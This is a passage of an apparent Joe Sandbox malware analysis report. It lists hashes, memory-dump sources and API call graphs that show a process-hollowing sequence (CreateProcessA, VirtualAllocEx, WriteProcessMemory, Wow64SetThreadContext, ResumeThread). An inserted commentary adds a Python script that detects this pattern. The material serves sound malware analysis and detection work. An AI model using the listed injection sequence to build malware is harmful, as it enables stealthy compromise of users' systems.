                • Opcode ID: 38ba04180db332cc998a362eedc6446f23d3b3dc70447028461156694a2e9b24
                • Instruction ID: c1f69ab223cdd0efc4681e8a109aff1789363228c5ef4c6cbbfdd7c13760a9ba
                • Opcode Fuzzy Hash: 38ba04180db332cc998a362eedc6446f23d3b3dc70447028461156694a2e9b24
                • Instruction Fuzzy Hash: 1211DFB9C003498FDB20DF9AD444A9EFBF8FB89724F10842AD919A7610D379A545CFA1
                APIs
                • OleInitialize.OLE32(00000000), ref: 0563CA3D
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Initialize
                • String ID:
                • API String ID: 2538663250-0
                • Opcode ID: ed01cc4f8ed7c23cfd4ed2eae962b3dd15189286eed95d182d72aa68ba841182
                • Instruction ID: d494169d4d5dfdb4214a0ad902afcf05c14f4527ea68fd0a21e0cef6af9e7f7f
                • Opcode Fuzzy Hash: ed01cc4f8ed7c23cfd4ed2eae962b3dd15189286eed95d182d72aa68ba841182
                • Instruction Fuzzy Hash: FE1103B58002488FDB20DF99D585B9EBBF4AF48314F24845AD559B3610D738A945CFA0
                APIs
                • OleInitialize.OLE32(00000000), ref: 0563CA3D
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Initialize
                • String ID:
                • API String ID: 2538663250-0
                • Opcode ID: 4256807ced2a2167c28f102886c5335db001f31ca90d96a11c8ffa3db6f554f5
                • Instruction ID: cc3b39406381b9441d723c7e8fbf29d083c7eff2ad6b6fe42bf1614b9860dd81
                • Opcode Fuzzy Hash: 4256807ced2a2167c28f102886c5335db001f31ca90d96a11c8ffa3db6f554f5
                • Instruction Fuzzy Hash: FE1103B18043488FDB20DF9AD449B9EBBF4EB48310F10845AE519B7240D778A944CFA5
                Memory Dump Source
                • Source File: 00000009.00000002.4557646767.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_12ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82696445627247ed91e14a49a5d419b82745efebf0bd5ad0aa2dcc8cfab4c060
                • Instruction ID: 8df9846bc1db63f6b5c8a6d38972baa169f42948248e42aafad1c3e25cad5d93
                • Opcode Fuzzy Hash: 82696445627247ed91e14a49a5d419b82745efebf0bd5ad0aa2dcc8cfab4c060
                • Instruction Fuzzy Hash: 2A2142B1110208DFDB05CF98D9C0F66BF65FB98324F60C569EA090B656C33AE446CBA2
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bb386f9ee2d115fb9808604767c1049816cb272df9d0de78511eb79ab2d96a6d
                • Instruction ID: 87774a0535062e2755fe5e1952f01874a8033bfdad0bbc3135160a8996b63813
                • Opcode Fuzzy Hash: bb386f9ee2d115fb9808604767c1049816cb272df9d0de78511eb79ab2d96a6d
                • Instruction Fuzzy Hash: 45210771584204DFDB05EF58D9C0B2ABFB5FB88314F60C96DD9094F656C33AE446CA61
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 093ab75eed86d2914a968159793f43111bb78c454355f4ae0e589a3e9d639165
                • Instruction ID: b58fd27fb232580f07166f0c5b94e4725d50e1858c4bde5aebadb08b45fc7f93
                • Opcode Fuzzy Hash: 093ab75eed86d2914a968159793f43111bb78c454355f4ae0e589a3e9d639165
                • Instruction Fuzzy Hash: 302125715842049FDB05EF58C5C0B2EBFB5FB84314F60C96ED9090F652C33AD406CA61
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 92ebabe7b2149c583c4c1a17cc2dda1ebf7cad421110c306f81df56fab48352f
                • Instruction ID: b264a96e58c937805a98b3b480269db46207d99c1bcb467d11607c776b4cd933
                • Opcode Fuzzy Hash: 92ebabe7b2149c583c4c1a17cc2dda1ebf7cad421110c306f81df56fab48352f
                • Instruction Fuzzy Hash: C6210071684204DFDB15EF68C580B2ABFA5FB84354F60C56DD9094F652D33AC806C661
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10b9548aac25334eb3479c2fd93d72964836a7e9bdb166b7a88a9b6bde0438c8
                • Instruction ID: c3e7fc52f23c5614465de0b926d00f9ef9419a388befde3c67f3f9e7a7977436
                • Opcode Fuzzy Hash: 10b9548aac25334eb3479c2fd93d72964836a7e9bdb166b7a88a9b6bde0438c8
                • Instruction Fuzzy Hash: A621A1755493808FDB13DF24C580719BF71FB46214F29C5EAD8498F6A3C33A984ACB62
                Memory Dump Source
                • Source File: 00000009.00000002.4557646767.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_12ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                • Instruction ID: 8c36c7013edc1e16a30bcbac6a6321d42c1549656c2b80616eac73acd8782891
                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                • Instruction Fuzzy Hash: 4B112676404284CFDB12CF54D5C4B56BF71FB88314F24C5A9D9490B657C336D45ACBA2
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction ID: e4bf751e4b0ef997e31f437c8ea2304c4a0a0241c1f096b5e8da0720254b5497
                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction Fuzzy Hash: 5E11DD75544280CFDB02DF54D5C4B19BFB1FB84314F28C6AAD9494F652C33AD40ACBA2
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction ID: ec1dab59090a600a4e996e678cdc19907a9984b1c33e902eb46fcc9ac5eed0f6
                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction Fuzzy Hash: 34110D75544280CFDB02DF54D9C4B19BFB1FB84314F24CAA9D8494F652C33AE40ACB62

                Execution Graph

                Execution Coverage:7.8%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:249
                Total number of Limit Nodes:17
                execution_graph 54079 e4d6c0 54080 e4d706 GetCurrentProcess 54079->54080 54082 e4d751 54080->54082 54083 e4d758 GetCurrentThread 54080->54083 54082->54083 54084 e4d795 GetCurrentProcess 54083->54084 54085 e4d78e 54083->54085 54086 e4d7cb 54084->54086 54085->54084 54087 e4d7f3 GetCurrentThreadId 54086->54087 54088 e4d824 54087->54088 54089 6ebebc0 54090 6ebebe6 54089->54090 54091 6ebec40 54090->54091 54093 7080e48 54090->54093 54095 7080e69 54093->54095 54094 7080e9f 54094->54091 54095->54094 54098 7081138 54095->54098 54102 7081140 54095->54102 54099 708113f PostMessageW 54098->54099 54101 70811ac 54099->54101 54101->54095 54103 7081173 PostMessageW 54102->54103 54105 70811ac 54103->54105 54105->54095 54002 e44668 54003 e4467a 54002->54003 54004 e44686 54003->54004 54008 e44779 54003->54008 54013 e43e28 54004->54013 54006 e446a5 54009 e4479d 54008->54009 54017 e44888 54009->54017 54021 e44878 54009->54021 54014 e43e33 54013->54014 54029 e45d2c 54014->54029 54016 e470a2 54016->54006 54018 e448af 54017->54018 54020 e4498c 54018->54020 54025 e444b0 54018->54025 54023 e448af 54021->54023 54022 e4498c 54022->54022 54023->54022 54024 e444b0 CreateActCtxA 54023->54024 54024->54022 54026 e45918 CreateActCtxA 54025->54026 54028 e459db 54026->54028 54030 e45d37 54029->54030 54033 e45d4c 54030->54033 54032 e4751d 54032->54016 54034 e45d57 54033->54034 54037 e45d7c 54034->54037 54036 e475fa 54036->54032 54038 e45d87 54037->54038 54041 e45dac 54038->54041 54040 e476ed 54040->54036 54042 e45db7 54041->54042 54044 e48c4b 54042->54044 54047 e4aef1 54042->54047 54043 e48c89 54043->54040 54044->54043 54050 e4cfe0 54044->54050 54055 e4b330 54047->54055 54051 e4d011 54050->54051 54052 e4d035 54051->54052 54063 e4d5a8 54051->54063 54067 e4d599 54051->54067 54052->54043 54058 e4b417 54055->54058 54056 e4af06 54056->54044 54059 e4b439 54058->54059 54060 e4b45c 54058->54060 54059->54060 54061 e4b660 GetModuleHandleW 54059->54061 54060->54056 54062 e4b68d 54061->54062 
54062->54056 54065 e4d5b5 54063->54065 54064 e4d5ef 54064->54052 54065->54064 54071 e4d3e0 54065->54071 54068 e4d5b5 54067->54068 54069 e4d5ef 54068->54069 54070 e4d3e0 GetModuleHandleW 54068->54070 54069->54052 54070->54069 54072 e4d3e5 54071->54072 54074 e4df00 54072->54074 54075 e4d4fc 54072->54075 54074->54074 54076 e4d507 54075->54076 54077 e45dac GetModuleHandleW 54076->54077 54078 e4df6f 54077->54078 54078->54074 54106 e4d908 DuplicateHandle 54107 e4d99e 54106->54107 54108 705d6f8 54113 705f038 54108->54113 54131 705f028 54108->54131 54149 705f07f 54108->54149 54109 705d707 54114 705f046 54113->54114 54168 708046e 54114->54168 54173 70806f7 54114->54173 54181 7080277 54114->54181 54193 70804f3 54114->54193 54197 7080253 54114->54197 54209 7080872 54114->54209 54213 7080310 54114->54213 54218 70808be 54114->54218 54230 7080778 54114->54230 54242 7080947 54114->54242 54246 7080007 54114->54246 54252 7080126 54114->54252 54258 7080426 54114->54258 54262 7080040 54114->54262 54268 708070f 54114->54268 54115 705f076 54115->54109 54132 705f038 54131->54132 54134 708046e 2 API calls 54132->54134 54135 708070f 2 API calls 54132->54135 54136 7080040 2 API calls 54132->54136 54137 7080426 2 API calls 54132->54137 54138 7080126 2 API calls 54132->54138 54139 7080007 2 API calls 54132->54139 54140 7080947 2 API calls 54132->54140 54141 7080778 6 API calls 54132->54141 54142 70808be 6 API calls 54132->54142 54143 7080310 2 API calls 54132->54143 54144 7080872 2 API calls 54132->54144 54145 7080253 6 API calls 54132->54145 54146 70804f3 2 API calls 54132->54146 54147 7080277 6 API calls 54132->54147 54148 70806f7 4 API calls 54132->54148 54133 705f076 54133->54109 54134->54133 54135->54133 54136->54133 54137->54133 54138->54133 54139->54133 54140->54133 54141->54133 54142->54133 54143->54133 54144->54133 54145->54133 54146->54133 54147->54133 54148->54133 54150 705f046 54149->54150 54152 705f08a 54149->54152 54153 708046e 2 API calls 54150->54153 54154 708070f 2 API calls 
54150->54154 54155 7080040 2 API calls 54150->54155 54156 7080426 2 API calls 54150->54156 54157 7080126 2 API calls 54150->54157 54158 7080007 2 API calls 54150->54158 54159 7080947 2 API calls 54150->54159 54160 7080778 6 API calls 54150->54160 54161 70808be 6 API calls 54150->54161 54162 7080310 2 API calls 54150->54162 54163 7080872 2 API calls 54150->54163 54164 7080253 6 API calls 54150->54164 54165 70804f3 2 API calls 54150->54165 54166 7080277 6 API calls 54150->54166 54167 70806f7 4 API calls 54150->54167 54151 705f076 54151->54109 54153->54151 54154->54151 54155->54151 54156->54151 54157->54151 54158->54151 54159->54151 54160->54151 54161->54151 54162->54151 54163->54151 54164->54151 54165->54151 54166->54151 54167->54151 54169 7080474 54168->54169 54272 705cf80 54169->54272 54276 705cf88 54169->54276 54170 7080a6f 54174 7080699 54173->54174 54174->54173 54176 70803ec 54174->54176 54288 705cdf0 54174->54288 54292 705cde8 54174->54292 54175 7080829 54175->54115 54176->54175 54280 705cd40 54176->54280 54284 705cd38 54176->54284 54182 708025f 54181->54182 54183 7080271 54182->54183 54186 7080c03 54182->54186 54187 705cf80 WriteProcessMemory 54182->54187 54188 705cf88 WriteProcessMemory 54182->54188 54185 70803ec 54183->54185 54189 705cdf0 Wow64SetThreadContext 54183->54189 54190 705cde8 Wow64SetThreadContext 54183->54190 54184 7080829 54184->54115 54185->54184 54191 705cd40 ResumeThread 54185->54191 54192 705cd38 ResumeThread 54185->54192 54186->54115 54187->54182 54188->54182 54189->54183 54190->54183 54191->54185 54192->54185 54194 708050d 54193->54194 54195 705cd40 ResumeThread 54194->54195 54196 705cd38 ResumeThread 54194->54196 54195->54194 54196->54194 54200 708025f 54197->54200 54198 7080271 54202 70803ec 54198->54202 54203 705cdf0 Wow64SetThreadContext 54198->54203 54204 705cde8 Wow64SetThreadContext 54198->54204 54199 7080829 54199->54115 54200->54198 54201 7080c03 54200->54201 54207 705cf80 WriteProcessMemory 54200->54207 54208 705cf88 
WriteProcessMemory 54200->54208 54201->54115 54202->54199 54205 705cd40 ResumeThread 54202->54205 54206 705cd38 ResumeThread 54202->54206 54203->54198 54204->54198 54205->54202 54206->54202 54207->54200 54208->54200 54211 705cdf0 Wow64SetThreadContext 54209->54211 54212 705cde8 Wow64SetThreadContext 54209->54212 54210 708049f 54210->54115 54211->54210 54212->54210 54214 7080316 54213->54214 54296 705d070 54214->54296 54300 705d078 54214->54300 54215 7080339 54215->54115 54219 708025f 54218->54219 54220 7080271 54219->54220 54223 7080c03 54219->54223 54228 705cf80 WriteProcessMemory 54219->54228 54229 705cf88 WriteProcessMemory 54219->54229 54222 70803ec 54220->54222 54224 705cdf0 Wow64SetThreadContext 54220->54224 54225 705cde8 Wow64SetThreadContext 54220->54225 54221 7080829 54221->54115 54222->54221 54226 705cd40 ResumeThread 54222->54226 54227 705cd38 ResumeThread 54222->54227 54223->54115 54224->54220 54225->54220 54226->54222 54227->54222 54228->54219 54229->54219 54236 705cf80 WriteProcessMemory 54230->54236 54237 705cf88 WriteProcessMemory 54230->54237 54231 708025f 54231->54230 54232 7080c03 54231->54232 54233 7080271 54231->54233 54232->54115 54235 70803ec 54233->54235 54240 705cdf0 Wow64SetThreadContext 54233->54240 54241 705cde8 Wow64SetThreadContext 54233->54241 54234 7080829 54234->54115 54235->54234 54238 705cd40 ResumeThread 54235->54238 54239 705cd38 ResumeThread 54235->54239 54236->54231 54237->54231 54238->54235 54239->54235 54240->54233 54241->54233 54304 705cec0 54242->54304 54308 705cec8 54242->54308 54243 7080965 54248 7080040 54246->54248 54247 70801cb 54247->54115 54248->54247 54312 705d210 54248->54312 54316 705d209 54248->54316 54254 708012f 54252->54254 54253 70801cb 54253->54115 54254->54253 54256 705d210 CreateProcessA 54254->54256 54257 705d209 CreateProcessA 54254->54257 54255 7080234 54255->54115 54256->54255 54257->54255 54259 7080433 54258->54259 54260 705cd40 ResumeThread 54259->54260 54261 705cd38 ResumeThread 54259->54261 
54260->54259 54261->54259 54264 7080073 54262->54264 54263 70801cb 54263->54115 54264->54263 54266 705d210 CreateProcessA 54264->54266 54267 705d209 CreateProcessA 54264->54267 54265 7080234 54265->54115 54266->54265 54267->54265 54270 705cf80 WriteProcessMemory 54268->54270 54271 705cf88 WriteProcessMemory 54268->54271 54269 7080740 54270->54269 54271->54269 54273 705cf87 WriteProcessMemory 54272->54273 54275 705d027 54273->54275 54275->54170 54277 705cfbb WriteProcessMemory 54276->54277 54279 705d027 54277->54279 54279->54170 54281 705cd80 ResumeThread 54280->54281 54283 705cdb1 54281->54283 54283->54176 54285 705cd40 ResumeThread 54284->54285 54287 705cdb1 54285->54287 54287->54176 54289 705ce35 Wow64SetThreadContext 54288->54289 54291 705ce7d 54289->54291 54291->54174 54293 705ce35 Wow64SetThreadContext 54292->54293 54295 705ce7d 54293->54295 54295->54174 54297 705d078 ReadProcessMemory 54296->54297 54299 705d107 54297->54299 54299->54215 54301 705d0c3 ReadProcessMemory 54300->54301 54303 705d107 54301->54303 54303->54215 54305 705cec7 VirtualAllocEx 54304->54305 54307 705cf45 54305->54307 54307->54243 54309 705cefb VirtualAllocEx 54308->54309 54311 705cf45 54309->54311 54311->54243 54313 705d299 CreateProcessA 54312->54313 54315 705d45b 54313->54315 54317 705d210 CreateProcessA 54316->54317 54319 705d45b 54317->54319
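The flattened execution_graph above is hard to read, but it carries the most useful fact in this part of the report: from the root function at 705d6f8 (node 54108) the graph reaches CreateProcessA (705d299), VirtualAllocEx (705cec7), WriteProcessMemory (705cf80/705cf88), Wow64SetThreadContext (705cdf0/705cde8) and ResumeThread (705cd40/705cd38), which together are the primitive set of process hollowing (RunPE). The following is an added example, not code from Joe Sandbox or from the report: it tokenizes the dump, rebuilds nodes and edges, and reports which root functions can reach every hollowing step, printing the function-address chain for each. The token grammar (decimal node id, hex address or address range, optional label tokens, and `a->b` edges) is inferred from the dump itself; the hollowing step set is the author's own choice; `EXEC_SAMPLE` is a trimmed excerpt of this report's execution_graph and `CFG_SAMPLE` a subset of one of the control_flow_graph dumps further down, both embedded so the script runs offline.

```python
"""Parse the whitespace-flattened execution_graph / control_flow_graph text
exported in a Joe Sandbox report and find roots that reach a full
process-hollowing (RunPE) primitive set.

Assumed token grammar (inferred from the dump, not a documented format):
  <decimal id> <hex addr | hex-hex range> [label tokens...]  -> node
  <id>-><id>                                                -> edge
Label tokens are Win32 API names (PascalCase) or summary text such as
"2 API calls" or "call e4d890".
"""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")     # "705cf80" or "e4d6b0-e4d74f"
EDGE = re.compile(r"^(\d+)->(\d+)$")
API_NAME = re.compile(r"^[A-Z][a-z][A-Za-z0-9]*$")  # CreateProcessA yes, "API" no

# Hollowing primitives (author's choice); any alternative satisfies its step.
HOLLOWING_STEPS = (
    {"CreateProcessA", "CreateProcessW"},
    {"VirtualAllocEx"},
    {"WriteProcessMemory"},
    {"Wow64SetThreadContext", "SetThreadContext"},
    {"ResumeThread"},
)

# Constructed sample: excerpt of this report's execution_graph (root 705d6f8),
# trimmed to the hollowing paths plus one "6 API calls" summary node.
EXEC_SAMPLE = """execution_graph
54108 705d6f8 54113 705f038 54108->54113 54131 705f028 54108->54131 54109 705d707
54114 705f046 54113->54114 54181 7080277 54114->54181 54242 7080947 54114->54242
54246 7080007 54114->54246 54115 705f076 54115->54109
54182 708025f 54181->54182 54183 7080271 54182->54183 54186 7080c03 54182->54186
54187 705cf80 WriteProcessMemory 54182->54187 54188 705cf88 WriteProcessMemory 54182->54188
54185 70803ec 54183->54185 54189 705cdf0 Wow64SetThreadContext 54183->54189
54184 7080829 54184->54115 54185->54184 54191 705cd40 ResumeThread 54185->54191
54186->54115 54187->54182 54189->54183 54191->54185
54304 705cec0 54242->54304 54305 705cec7 VirtualAllocEx 54304->54305
54248 7080040 54246->54248 54312 705d210 54248->54312 54313 705d299 CreateProcessA 54312->54313
54132 705f038 54131->54132 54141 7080778 6 API calls 54132->54141 54133 705f076 54131->54133 54141->54133
"""

# Constructed sample: subset of one control_flow_graph dump from the report,
# showing the address-range node form and a "call <addr>" label.
CFG_SAMPLE = ("control_flow_graph 672 e4d6b0-e4d74f GetCurrentProcess 676 e4d751-e4d757 "
              "672->676 677 e4d758-e4d78c GetCurrentThread 672->677 676->677 "
              "678 e4d795-e4d7c9 GetCurrentProcess 677->678 681 e4d7d2-e4d7ed call e4d890 678->681")


def parse_graph(text):
    """Return (nodes, edges): nodes[id] = {addr, apis, label}; edges[id] = set(children)."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(set)
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[int(m.group(1))].add(int(m.group(2)))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "label": ""}
            i += 2
        else:
            if current is not None:          # any other token labels the current node
                node = nodes[current]
                node["label"] = (node["label"] + " " + tok).strip()
                if API_NAME.match(tok):
                    node["apis"].append(tok)
            i += 1
    return nodes, dict(edges)


def roots(nodes, edges):
    """Nodes with no incoming edge: the entry functions of each component."""
    targets = {c for children in edges.values() for c in children}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, root):
    """BFS from root -> {api: [addr, ...]}: the function chain to the first node calling it."""
    parent, queue, found = {root: None}, deque([root]), {}
    while queue:
        n = queue.popleft()
        for api in nodes[n]["apis"]:
            found.setdefault(api, _chain(parent, nodes, n))
        for c in sorted(edges.get(n, ())):       # sorted -> deterministic chains
            if c in nodes and c not in parent:   # skip edges to nodes not in the excerpt
                parent[c] = n
                queue.append(c)
    return found


def _chain(parent, nodes, n):
    chain = []
    while n is not None:
        chain.append(nodes[n]["addr"])
        n = parent[n]
    return chain[::-1]


def find_hollowing(nodes, edges):
    """[(root_addr, apis)] for roots from which every hollowing step is reachable."""
    hits = []
    for r in roots(nodes, edges):
        apis = reachable_apis(nodes, edges, r)
        if all(step & set(apis) for step in HOLLOWING_STEPS):
            hits.append((nodes[r]["addr"], apis))
    return hits


if __name__ == "__main__":
    nodes, edges = parse_graph(EXEC_SAMPLE)
    for root_addr, apis in find_hollowing(nodes, edges):
        print(f"hollowing primitives reachable from {root_addr}:")
        for step in HOLLOWING_STEPS:
            api = next(iter(step & set(apis)))
            print(f"  {api:<22} via {' -> '.join(apis[api])}")
```

Reachability, not call order, is what the graph gives you: the dump records which functions call which, so the script reports that all five primitives hang off one root rather than claiming a sequence. Paste the full execution_graph token string in place of `EXEC_SAMPLE` to run it over the whole report; the same tokenizer accepts the control_flow_graph dumps because their nodes only differ by carrying an address range.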
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: $eq$,aq$,aq$4c]q$4c]q$heq$heq$heq$|b^q$|b^q$|b^q$$]q$$]q$$]q$;($[0$c]q$c]q$c]q$c]q$k0
                • API String ID: 0-1774614325
                • Opcode ID: d1aa51b1196c96d77ed38c3a7ee4cd94f137d4bbcae7ddfb257a51fbb01ecaf4
                • Instruction ID: d6d57a75056af80a21101e1dd20ebf65e78f3d2d19c86eae59ecad8a8f6a406d
                • Opcode Fuzzy Hash: d1aa51b1196c96d77ed38c3a7ee4cd94f137d4bbcae7ddfb257a51fbb01ecaf4
                • Instruction Fuzzy Hash: 02B23774B002148FCB28DF29C994A69BBF6FF88710F1585A9E54ADB3A5DB30DC81CB51

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 672 e4d6b0-e4d74f GetCurrentProcess 676 e4d751-e4d757 672->676 677 e4d758-e4d78c GetCurrentThread 672->677 676->677 678 e4d795-e4d7c9 GetCurrentProcess 677->678 679 e4d78e-e4d794 677->679 681 e4d7d2-e4d7ed call e4d890 678->681 682 e4d7cb-e4d7d1 678->682 679->678 685 e4d7f3-e4d822 GetCurrentThreadId 681->685 682->681 686 e4d824-e4d82a 685->686 687 e4d82b-e4d88d 685->687 686->687
                APIs
                • GetCurrentProcess.KERNEL32 ref: 00E4D73E
                • GetCurrentThread.KERNEL32 ref: 00E4D77B
                • GetCurrentProcess.KERNEL32 ref: 00E4D7B8
                • GetCurrentThreadId.KERNEL32 ref: 00E4D811
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 852eb3e9b655a320f22a69f356d7d7b330247f88cf87043cfd81d22b38c46157
                • Instruction ID: 8f2b2677f28f5405f11490e9cf5ab1b21ee63d8a1b4882b1df198851861ad7cd
                • Opcode Fuzzy Hash: 852eb3e9b655a320f22a69f356d7d7b330247f88cf87043cfd81d22b38c46157
                • Instruction Fuzzy Hash: 0A5168B09007498FDB18DFA9D948BAEBBF1FF89314F208069E419B7390D7749984CB65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 694 e4d6c0-e4d74f GetCurrentProcess 698 e4d751-e4d757 694->698 699 e4d758-e4d78c GetCurrentThread 694->699 698->699 700 e4d795-e4d7c9 GetCurrentProcess 699->700 701 e4d78e-e4d794 699->701 703 e4d7d2-e4d7ed call e4d890 700->703 704 e4d7cb-e4d7d1 700->704 701->700 707 e4d7f3-e4d822 GetCurrentThreadId 703->707 704->703 708 e4d824-e4d82a 707->708 709 e4d82b-e4d88d 707->709 708->709
                APIs
                • GetCurrentProcess.KERNEL32 ref: 00E4D73E
                • GetCurrentThread.KERNEL32 ref: 00E4D77B
                • GetCurrentProcess.KERNEL32 ref: 00E4D7B8
                • GetCurrentThreadId.KERNEL32 ref: 00E4D811
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 63ba2f6fd585970b30758bfb44baea498223a023cc31f904564c10c2814ed83e
                • Instruction ID: 1fc47c257a86c9fbf4413cae6c2791d3cecd761084027b7dd77b3c269b90e198
                • Opcode Fuzzy Hash: 63ba2f6fd585970b30758bfb44baea498223a023cc31f904564c10c2814ed83e
                • Instruction Fuzzy Hash: A85138B09016098FDB18DFA9D948BAEBBF1FF88314F20C469D419B7350D7749984CB65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 716 57e9e68-57e9e81 718 57e9ebb-57e9ee0 716->718 719 57e9e83-57e9e85 716->719 720 57e9ee7-57e9f0c 718->720 719->720 721 57e9e87-57e9e89 719->721 724 57e9f13-57e9f6c 720->724 723 57e9e8f-57e9e98 721->723 721->724 725 57e9e9a-57e9ea4 723->725 726 57e9ea6 723->726 739 57e9f6e 724->739 740 57e9f78-57e9fb2 724->740 730 57e9ea8-57e9eab 725->730 726->730 735 57e9eb3-57e9eb8 730->735 739->740
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: (aq$(aq$(aq
                • API String ID: 0-2593664646
                • Opcode ID: 64055ca06486e7973a232bb66ff391d911eca6155d15fb908990add40cf492da
                • Instruction ID: 0197df84b6cb147a042abcf9e7fd60378d20e596a527e02edd9ba0c7c4871329
                • Opcode Fuzzy Hash: 64055ca06486e7973a232bb66ff391d911eca6155d15fb908990add40cf492da
                • Instruction Fuzzy Hash: 7F3126327042155FC754DE6DD840AAFBBEAEFC8361724812AE909DB389DE31DD0287E1

                Control-flow Graph: basic blocks 57ec1b0-57efa68, with calls into 57efab8, 57efac8, 57efb20 and 57efb70 (rendered graph with Executed/Not Executed colouring not reproduced)
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c472f78a28859c2e33d696c1e635e9dd927d4e703766337f9afa4b91892fa846
                • Instruction ID: 567e5b412f2065ef9c1563fb86c729fb85194a1b8fabdfe31e6e18ea7cb0540e
                • Opcode Fuzzy Hash: c472f78a28859c2e33d696c1e635e9dd927d4e703766337f9afa4b91892fa846
